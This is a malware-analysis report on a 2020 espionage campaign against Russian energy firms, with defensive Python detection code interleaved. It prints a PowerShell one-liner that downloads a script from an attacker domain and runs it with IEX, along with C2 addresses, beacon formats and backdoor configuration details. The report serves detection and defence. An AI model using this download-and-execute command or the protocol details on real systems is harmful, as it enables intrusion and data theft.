Investigating targeted espionage attacks on the Russian fuel and energy sector


Our experience in investigating computer security incidents shows that e-mail is still one of the channels attackers use most often to get an initial foothold in the targeted network infrastructure. A single careless action with a suspicious (or not-so-suspicious) message becomes the entry point for further infection, which is why cybercriminals make active use of social engineering techniques, although with varying degrees of success.

In this post we want to talk about our recent investigation of a malware campaign aimed at a number of companies in the Russian fuel and energy complex. All the attacks followed the same scenario using fake e-mails, and nobody seems to have put much effort into the content of those e-mails.

Reconnaissance

It all started at the end of April 2020, when Doctor Web virus analysts detected a malware campaign in which the attackers sent an updated telephone directory to employees of a number of companies in the Russian fuel and energy sector. Of course, this was not a simple show of courtesy: the directory was not genuine, and the .docx documents loaded two images from remote resources.

One of them was downloaded to the user's computer from the news[.]zannews[.]com server. Notably, the domain name resembles the domain of the Kazakh anti-corruption media centre, zannews[.]kz. On the other hand, the domain used immediately brought to mind another campaign from 2015, known as TOPNEWS, which used the ICEFOG backdoor and whose Trojan control domains contained the substring "news" in their names. Another interesting detail was that when the e-mails were sent to different recipients, the image download requests used different request parameters or different image names.

We believe this was done to collect information in order to identify a "reliable" addressee, one who is guaranteed to open the message at the right time. The SMB protocol was used to download the image from the second server, which could have been done to collect NetNTLM hashes from the computers of employees who opened the received document.

And here is the message itself, with its fake text:


In June of this year the attackers started using a new domain name, sports[.]manhajnews[.]com, to load the images. Analysis showed that subdomains of manhajnews[.]com had been used in malware mailings since at least September 2019. One of the targets of that campaign was a large Russian university.

Also in June, the organisers of the attack came up with a new text for their messages: this time the document contained information about the development of the industry. The text of the message clearly showed that its author was either not a native Russian speaker or was deliberately creating that impression. Unfortunately, the ideas on industry development, as usual, turned out to be just a cover: the document again loaded two images, while the server was changed to download[.]inklingpaper[.]com.

The next innovation followed in July. In an attempt to bypass detection of the malicious documents by anti-virus programs, the attackers started using password-protected Microsoft Word documents. At the same time, the attackers decided to use a classic social engineering technique: a bonus notification.


The text of the appeal was again written in the same style, which raised additional suspicion among the addressees. The server used to download the image did not change either.

Note that in all cases, mailboxes registered on the mail[.]ru and yandex[.]ru domains were used to send the messages.

Attack

In early September 2020, it was time to act. Our virus analysts recorded a new wave of attacks, in which the attackers again sent messages under the pretext of updating the telephone directory. This time, however, the attachment contained a malicious macro.

When the attached document was opened, the macro created two files:

  • a VBS script, %APPDATA%\microsoft\windows\start menu\programs\startup\adoba.vbs, intended to launch the batch file;
  • the batch file itself, %APPDATA%\configs\test.bat, which was obfuscated.


Its job boils down to launching a PowerShell shell with certain parameters. The parameters passed to the shell decode into the following commands:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

Judging by the commands that get launched, the domain from which the payload is loaded is once again disguised as a news site. The payload is a simple loader whose only task is to obtain shellcode from the command and control server and execute it. We were able to identify two types of backdoors that could be installed on the victim's PC.
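The persistence chain above (a VBS script in the Startup folder, a batch file, and a PowerShell one-liner that fetches and IEXes a remote script through a COM XMLHTTP object) is easy to triage from a host artefact collection. The following is an added example written for this post, not code from the Doctor Web report: it flags script files dropped into a Startup folder and scans a command line for the download-and-execute pattern shown above. The indicator names and the `triage` helper are my own; the CLSID, paths and URL are the ones quoted in the report.

```python
import re
from pathlib import PureWindowsPath

# CLSID quoted in the report's PowerShell command (an XMLHTTP COM object used as a downloader).
XMLHTTP_CLSID = "F5078F35-C551-11D3-89B9-0000F81FE221"

# Indicators for the download-and-execute one-liner; names are my own.
INDICATORS = {
    "com_xmlhttp_clsid": re.compile(re.escape(XMLHTTP_CLSID), re.I),
    "activator_createinstance": re.compile(r"\[activator\]::CreateInstance", re.I),
    "iex_of_response": re.compile(r"\b(IEX|Invoke-Expression)\b[^;\n]*responseText", re.I),
}
URL_RE = re.compile(r"https?://[^\s\"')]+", re.I)
SCRIPT_SUFFIXES = {".vbs", ".bat", ".cmd", ".js"}


def scan_script(text: str) -> list:
    """Names of the indicators present in a script body or command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def extract_urls(text: str) -> list:
    """Every http(s) URL embedded in the script, for blocking / hunting."""
    return URL_RE.findall(text)


def is_startup_script(path: str) -> bool:
    """True for a script file placed under a Start Menu\\Programs\\Startup folder."""
    p = PureWindowsPath(path)
    parts = [s.lower() for s in p.parts]
    return p.suffix.lower() in SCRIPT_SUFFIXES and "start menu" in parts and "startup" in parts


def triage(dropped_paths: list, script_text: str) -> dict:
    """Combine the two checks into one verdict for a collected host."""
    persistence = [p for p in dropped_paths if is_startup_script(p)]
    indicators = scan_script(script_text)
    return {
        "persistence": persistence,
        "indicators": indicators,
        "urls": extract_urls(script_text),
        # Startup persistence plus a remote-fetch-and-IEX chain is the combination seen here.
        "suspicious": bool(persistence) and "iex_of_response" in indicators,
    }


# The command line quoted in the report, used here only as matching input.
SAMPLE_CMD = (
    '$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));'
    '$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;'
)
# Paths from the report; the list itself is a constructed "collected artefacts" input.
SAMPLE_DROPPED = [
    r"%APPDATA%\microsoft\windows\start menu\programs\startup\adoba.vbs",
    r"%APPDATA%\configs\test.bat",
]

if __name__ == "__main__":
    print(triage(SAMPLE_DROPPED, SAMPLE_CMD))
```

The point of pairing the two checks is that either one alone is noisy: legitimate software drops things into Startup, and XMLHTTP is used by benign scripts. A script in Startup whose chain ends in `IEX` of a freshly downloaded response is the specific shape described in the report.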

BackDoor.Siggen2.3238

The first is BackDoor.Siggen2.3238. Our specialists had not encountered it before, and no other anti-virus vendors had mentioned this program either.

This program is a backdoor written in C++ that runs on 32-bit Windows operating systems.

BackDoor.Siggen2.3238 can communicate with the control server using two protocols: HTTP and HTTPS. The examined sample uses HTTPS. The following User-Agent is used in requests to the server:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

In addition, all requests carry the following set of parameters:

%s;type=%s;length=%s;realdata=%send

where each %s is replaced, in order, with:

  • the ID of the infected computer,
  • the type of request being sent,
  • the length of the data in the realdata field,
  • the data itself.

At the stage of collecting information about the infected system, the backdoor generates a string of the form:

lan=%s;cmpname=%s;username=%s;version=%s;

where lan is the IP address of the infected computer on the local network, cmpname is the computer name, username is the user name, and version is the string 0.0.4.03.

This information, with the sysinfo identifier, is sent by a POST request to the control server located at https[:]//31.214[.]157.14/log.txt. If BackDoor.Siggen2.3238 receives the HEART signal in response, the connection is considered successful, and the backdoor begins its main cycle of communication with the server.
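The two string templates above (the request body and the sysinfo payload) together with the fixed User-Agent are enough to write a network-side check. The code below is an added example, not part of the Doctor Web report or the backdoor itself: it parses a captured request body against the `%s;type=%s;length=%s;realdata=%send` template, decodes the sysinfo fields, cross-checks the length field against the payload, and returns a verdict for one request. The bot ID, hostname and user name in the sample request are constructed; the verdict labels and function names are my own.

```python
import re

# User-Agent the sample sends in every request (quoted in the report).
SIGGEN_USER_AGENT = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)"

# Request template from the report: %s;type=%s;length=%s;realdata=%send
BEACON_RE = re.compile(
    r"^(?P<bot_id>[^;]+);type=(?P<type>[^;]+);length=(?P<length>\d+);realdata=(?P<data>.*)end$",
    re.S,
)
# sysinfo payload template from the report: lan=%s;cmpname=%s;username=%s;version=%s;
SYSINFO_RE = re.compile(
    r"^lan=(?P<lan>[^;]*);cmpname=(?P<cmpname>[^;]*);"
    r"username=(?P<username>[^;]*);version=(?P<version>[^;]*);$"
)


def parse_beacon(body: str):
    """Split a request body into bot_id / type / length / data, or None if it does not match."""
    m = BEACON_RE.match(body)
    if m is None:
        return None
    rec = m.groupdict()
    rec["length"] = int(rec["length"])
    # The length field describes the realdata payload; a mismatch is worth flagging.
    rec["length_ok"] = rec["length"] == len(rec["data"])
    return rec


def parse_sysinfo(data: str):
    """Decode the lan/cmpname/username/version fields of a sysinfo payload."""
    m = SYSINFO_RE.match(data)
    return m.groupdict() if m else None


def is_heart_response(text: str) -> bool:
    """The report only says the HEART signal is received; substring match is the safe reading."""
    return "HEART" in text


def classify_request(headers: dict, body: str) -> str:
    """Verdict for one captured HTTP request (labels are my own)."""
    ua = headers.get("User-Agent", "")
    beacon = parse_beacon(body)
    if beacon is None:
        return "ua-match-only" if ua == SIGGEN_USER_AGENT else "no-match"
    if beacon["type"] == "sysinfo" and parse_sysinfo(beacon["data"]):
        return "siggen2-sysinfo"
    return "siggen2-beacon"


# Constructed sample request (not real traffic): IDs, hostname and user are made up.
SAMPLE_SYSINFO = "lan=10.0.0.5;cmpname=WKS-01;username=ivanov;version=0.0.4.03;"
SAMPLE_BODY = f"A1B2C3D4;type=sysinfo;length={len(SAMPLE_SYSINFO)};realdata={SAMPLE_SYSINFO}end"
SAMPLE_HEADERS = {"User-Agent": SIGGEN_USER_AGENT}

if __name__ == "__main__":
    print(classify_request(SAMPLE_HEADERS, SAMPLE_BODY), parse_sysinfo(parse_beacon(SAMPLE_BODY)["data"]))
```

Because the sample talks HTTPS, the body is only visible where TLS is terminated (a proxy or an EDR hook); the User-Agent alone is a weak signal, which is why the verdict keeps "ua-match-only" separate from a parsed beacon.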

A more complete description of how BackDoor.Siggen2.3238 operates is available in our virus library.

BackDoor.Whitebird.23

The second program is a modification of the BackDoor.Whitebird backdoor, already known to us from an incident involving a government agency in Kazakhstan. This version is written in C++ and is designed to run on both 32-bit and 64-bit Windows operating systems.

Like most programs of this type, BackDoor.Whitebird.23 is designed to establish an encrypted connection with the command and control server and to take unauthorised control of the infected computer. It is installed on the compromised system by the BackDoor.Siggen2.3244 dropper.

The sample we examined was a malicious library with two exports:

  • Google Play
  • Test

At the start of its work, it decrypts the configuration hard-coded in the backdoor body using an algorithm based on XORing with the byte 0x99. The configuration looks like this:

struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];        // C&C address used for the TLS-like handshake below
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];    // one 0/1 flag per minute of the day
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];            // decompiler-generated name for the gap at offset 0xA8C
};

To ensure it keeps running, the backdoor changes the value specified in the working_hours field of the configuration. The field contains 1440 bytes, each taking the value 0 or 1 and representing one minute of each hour of the day. For each network interface it creates a separate thread that listens on the interface and looks for proxy-server authorisation packets coming from the infected computer. When such a packet is detected, the backdoor adds information about the proxy server to its list. In addition, it checks for a proxy via the InternetQueryOptionW WinAPI function.

The program checks the current hour and minute and compares them with the data in the working_hours field of the configuration. If the value for the corresponding minute of the day is non-zero, a connection is established with the control server.
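The st_cfg layout above and the XOR 0x99 scheme are enough to write a configuration extractor that an analyst can run on the decrypted blob, plus the working_hours check the backdoor performs. The code below is an added example written for this post, not code from the report or the backdoor: it maps the struct with fixed-width fields (wchar_t taken as 2 bytes, which puts every _DWORD on a 4-byte boundary and proxy_password at offset 0xA8C, matching the gapa8c name), decrypts a constructed sample config, and evaluates the per-minute flags. The assumption that byte N of working_hours covers minute N of the day (00:00 = 0) is mine; the C&C hostname and campaign string in the sample are placeholders.

```python
import struct
from datetime import datetime

XOR_KEY = 0x99

# st_cfg from the report: DWORD, wchar_t[64], wchar_t[256], DWORD, wchar_t[100] x2,
# BYTE[1440], wchar_t[50], DWORD x3, BYTE[50] x2, BYTE[256]  (2956 bytes, no padding needed)
CFG_FMT = "<I128s512sI200s200s1440s100sIII50s50s256s"
CFG_SIZE = struct.calcsize(CFG_FMT)


def xor_decrypt(blob: bytes) -> bytes:
    """XOR every byte with 0x99; the same call encrypts and decrypts."""
    return bytes(b ^ XOR_KEY for b in blob)


def _wstr(raw: bytes) -> str:
    """NUL-terminated UTF-16LE string out of a fixed-width wchar_t array."""
    return raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]


def _astr(raw: bytes) -> str:
    """NUL-terminated byte string out of a fixed-width _BYTE array."""
    return raw.split(b"\x00", 1)[0].decode("latin-1")


def parse_config(plain: bytes) -> dict:
    """Map a decrypted config blob onto the st_cfg fields."""
    f = struct.unpack(CFG_FMT, plain[:CFG_SIZE])
    return {
        "dword0": f[0],
        "campaign": _wstr(f[1]),
        "cnc_addr": _wstr(f[2]),
        "cnc_port": f[3],
        "cnc_addr2": _wstr(f[4]),
        "cnc_addr3": _wstr(f[5]),
        "working_hours": f[6],
        "proxy_domain": _wstr(f[7]),
        "proxy_port": f[8],
        "proxy_type": f[9],
        "use_proxy": f[10],
        "proxy_login": _astr(f[11]),
        "proxy_password": _astr(f[12]),
    }


def minute_of_day(when: datetime) -> int:
    return when.hour * 60 + when.minute


def beaconing_allowed(working_hours: bytes, when: datetime) -> bool:
    """The check described in the report; byte-per-minute indexing is an assumption."""
    return working_hours[minute_of_day(when)] != 0


def active_windows(working_hours: bytes) -> list:
    """Collapse the 1440 flags into (start_minute, end_minute) ranges for a report."""
    ranges, start = [], None
    for m, flag in enumerate(working_hours):
        if flag and start is None:
            start = m
        elif not flag and start is not None:
            ranges.append((start, m))
            start = None
    if start is not None:
        ranges.append((start, 1440))
    return ranges


def build_sample_config() -> bytes:
    """Constructed, already-encrypted config for the demo (values are placeholders)."""
    hours = bytes(1 if 9 * 60 <= m < 18 * 60 else 0 for m in range(1440))   # 09:00-18:00 only
    plain = struct.pack(
        CFG_FMT, 0, "demo".encode("utf-16-le"), "c2.example.invalid".encode("utf-16-le"),
        443, b"", b"", hours, b"", 0, 0, 0, b"", b"", b"",
    )
    return xor_decrypt(plain)


if __name__ == "__main__":
    cfg = parse_config(xor_decrypt(build_sample_config()))
    print(cfg["cnc_addr"], cfg["cnc_port"], active_windows(cfg["working_hours"]))
```

Working-hours windows are worth extracting: a backdoor that only beacons during office hours hides inside the victim's normal traffic profile, so any baseline-based detection should look at the same window rather than at night-time anomalies.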

Establishing a connection to the server imitates setting up a connection between client and server using TLS protocol version 1.0. The backdoor body contains two buffers.

The first buffer contains a TLS 1.0 Client Hello packet.


The second buffer contains TLS 1.0 Client Key Exchange packets with a key length of 0x100 bytes, a Change Cipher Spec and an Encrypted Handshake Message.


When sending the Client Hello packet, the backdoor writes 4 bytes of the current time and 28 bytes of pseudo-random data into the Client Random field, calculated as follows:


v3 = time(0);                                   // current Unix time
// byte-swap v3: t is the timestamp in big-endian (network) byte order
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
// 28 bytes = 7 DWORDs: t plus overlapping DWORDs read from the C&C address (a wchar_t array)
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
// then each byte is XORed with 7 times its index
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

The resulting packet is sent to the control server. The response (the Server Hello packet) is checked for:

  • TLS protocol version 1.0;
  • a match between the timestamp (the first 4 bytes of the Random field) set by the client and the timestamp returned by the server;
  • a match between the 4 bytes following the timestamp in the client's and the server's Random fields.

If these matches are present, the backdoor prepares the Client Key Exchange packet. To do this, it modifies the Public Key in the Client Key Exchange packet, as well as the Encryption IV and Encryption Data in the Encrypted Handshake Message packet.

The backdoor then receives a packet from the command and control server, checks that the TLS protocol version is 1.0, and accepts a further 54 bytes (the packet body). This completes the connection setup.
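The Client Random derivation and the three Server Hello checks above are small enough to reproduce exactly, which is useful for two reasons: an analyst can confirm a capture belongs to this family by recomputing the Random from the timestamp and the configured C&C address, and the echo check itself is a network fingerprint, because a genuine TLS server never copies the first 8 bytes of the client's Random into its own. The code below is an added example written for this post, not code from the report or the backdoor. It reimplements the decompiled loop (including the overlapping DWORD reads that `&cnc_addr[i / 4]` on a wchar_t array implies), builds a minimal Server Hello record for testing, and applies the three checks. The assumption that the timestamp is placed first in big-endian order (the normal TLS gmt_unix_time layout) is mine; the C&C hostname is a placeholder.

```python
import time


def swap32(x: int) -> int:
    """Byte-swap a 32-bit value; this is what the shift/BYTEn expression in the decompiled code does."""
    return int.from_bytes((x & 0xFFFFFFFF).to_bytes(4, "little"), "big")


def client_random(timestamp: int, cnc_addr: str) -> bytes:
    """Rebuild the 32-byte Client Random: 4 timestamp bytes + 28 derived bytes."""
    t = swap32(timestamp)
    # cnc_addr is a wchar_t array in st_cfg, so index i/4 is byte offset i/2: the 7 DWORDs overlap.
    wide = cnc_addr.encode("utf-16-le").ljust(32, b"\x00")
    rnd = bytearray(28)
    for i in range(0, 28, 4):
        d = int.from_bytes(wide[i // 2:i // 2 + 4], "little")
        rnd[i:i + 4] = ((t + d) & 0xFFFFFFFF).to_bytes(4, "little")
    for j in range(28):
        rnd[j] ^= (7 * j) & 0xFF          # (_BYTE) truncation of 7*j
    # Assumption: timestamp first, big-endian, as in a standard TLS gmt_unix_time.
    return (timestamp & 0xFFFFFFFF).to_bytes(4, "big") + bytes(rnd)


def build_server_hello(server_random: bytes) -> bytes:
    """Minimal TLS 1.0 Server Hello record (constructed for the demo; cipher suite 0x002F)."""
    body = b"\x03\x01" + server_random + b"\x00" + b"\x00\x2f" + b"\x00"   # version, random, sid, cs, comp
    handshake = b"\x02" + len(body).to_bytes(3, "big") + body             # HandshakeType 2
    return b"\x16\x03\x01" + len(handshake).to_bytes(2, "big") + handshake


def server_hello_accepted(client_rand: bytes, record: bytes) -> bool:
    """The three checks the report lists, applied to a raw Server Hello record."""
    if len(record) < 5 + 4 + 2 + 32:
        return False
    if record[0] != 0x16 or record[1:3] != b"\x03\x01":      # record layer: handshake, TLS 1.0
        return False
    if record[5] != 0x02 or record[9:11] != b"\x03\x01":     # Server Hello, TLS 1.0
        return False
    srv_rand = record[11:43]
    return srv_rand[:4] == client_rand[:4] and srv_rand[4:8] == client_rand[4:8]


def looks_like_echoed_random(client_rand: bytes, record: bytes) -> bool:
    """Detection view: a real server never echoes the client's first 8 Random bytes."""
    return server_hello_accepted(client_rand, record)


if __name__ == "__main__":
    cr = client_random(int(time.time()), "c2.example.invalid")
    print(cr.hex(), server_hello_accepted(cr, build_server_hello(cr[:8] + b"\x00" * 24)))
```

For the test vector, an empty C&C string zeroes the added DWORDs, so the 28 derived bytes reduce to the swapped timestamp repeated seven times and then XORed with 7*j; with timestamp 0x12345678 the first derived DWORD is 12 34 56 78 and becomes 12 33 58 6D after the XOR.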

A more complete description of how BackDoor.Whitebird.23 operates is available in our virus library.

Conclusions

Analysis of the documents, the malware and the infrastructure used allows us to say with confidence that the attack was prepared by one of the Chinese APT groups. Given the functionality of the backdoors installed on victims' computers in the event of a successful attack, infection leads, at a minimum, to the theft of confidential information from the computers of the attacked organisations.

In addition, a very likely scenario is the installation of specialised Trojans on local servers with special functions. These could be domain controllers, mail servers, Internet gateways and so on. As the example of the incident in Kazakhstan shows, such servers are of particular interest to attackers for a variety of reasons.

Source: www.habr.com
